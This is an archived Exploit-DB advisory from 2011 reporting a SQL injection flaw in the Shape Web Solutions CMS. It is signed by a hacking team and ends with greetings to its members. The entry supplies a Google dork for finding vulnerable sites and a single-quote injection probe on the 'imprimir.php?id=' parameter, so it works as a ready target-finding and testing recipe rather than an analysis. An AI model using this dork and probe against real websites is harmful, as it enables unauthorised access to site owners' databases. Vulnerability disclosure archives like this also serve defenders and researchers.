Shape Web Solutions CMS - SQL Injection

EDB-ID:

17180

CVE:

N/A


Platform:

PHP

Date:

2011-04-16


#####################################################################################
####                  Shape Web Solutions CMS SQL Injection Vulnerability        ####
#####################################################################################
#                                                                                  #
# Exploit Title: Shape Web Solutions CMS SQL Injection Vulnerability                #
# Author: Ashiyane Digital Security Team                                            #
# Date: 03-18-2011                                                                 #
# Vendor or Software Link: http://www.shapeweb.com.br/                              #
# Version: All version                                                              #
# Category:: webapps                                                                #
# Google dork: inurl:".br/imprimir.php?id="                                         #
# Exploit : /imprimir.php?id=1'                                                     #
# Demo: http://site/imprimir.php?id=1'                                              #
#                                                                                  #
################################Discovered By HashoR#################################
#                                      [Greetz]                                    #
#                                                                                  #
# Zend -=- Virangar-=-Milad-Bushehr -=- Iman_TakTaz -=- M3QD4D -=- Hijacker         #
# -=- elvator -=- r3d.z0nE -=- Behrooz_Ice -=- Ali_Eagle -=- Satanic2000 -=- Rz04   #
#                                                                                  #
###################################### TNX All ######################################